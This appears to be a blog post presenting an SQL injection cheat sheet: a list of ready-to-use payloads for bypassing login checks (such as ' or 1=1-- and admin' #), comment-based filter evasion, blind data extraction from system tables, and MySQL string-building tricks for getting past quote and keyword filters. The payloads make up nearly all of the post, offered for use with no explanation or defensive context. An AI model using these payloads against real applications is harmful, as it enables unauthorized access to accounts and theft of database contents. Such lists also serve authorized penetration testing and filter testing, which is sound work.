SQLi Cheatsheet

admin’ —
admin’ #
admin’/*
‘ or 1=1–
‘ or 1=1#
‘ or 1=1/*
‘) or ‘1’=’1–
‘) or (‘1’=’1–
‘ or ‘1=1
admin’ or’1=1
‘ or 1=1 or ”=’
‘or’a’=’a
‘or 1=1;#
user: admin’ or 1=1– pass: ‘ or 1=1–
‘ /*!50000or*/1=’1
‘ /*!or*/1=’1
1 OR 1=1
1’ OR ‘1’=’1
1’1
1′ AND 1=(SELECT COUNT(*) FROM tablenames); —
1 AND USER_NAME() = ‘dbo’
\’; DESC users; —
‘ OR username IS NOT NULL OR username = ‘
1 UNI/**/ON SELECT ALL FROM WHERE
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype=’U’), 1, 1))) > 116
SQLi filter(Function based)
General function filtering
ascii (97)
load_file/*foo*/(0×616263)
Strings functions
‘abc’ = unhex(616263)
‘abc’ = char(97,98,99)
ord(‘a’) = 97
‘ABC’ = concat(conv(10,10,36),conv(11,10,36),conv(12,10,36))
hex(‘a’) = 61
ascii(‘a’) = 97
Strings extracted from gadgets
collation(\N) // binary
collation(user()) // utf8_general_ci
@@time_format // %H:%i:%s
@@binlog_format // MIXED
monthname(from_days(690)) // November
monthname(from_unixtime(1)) // January
@@version_comment // MySQL Community Server (GPL)
dayname(from_days(401)) // Monday
dayname(from_days(403)) // Wednesday
collation(convert((1)using/**/koi8r)) // koi8r_general_ci
(select(collation_name)from(information_schema.collations)where(id)=2)

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: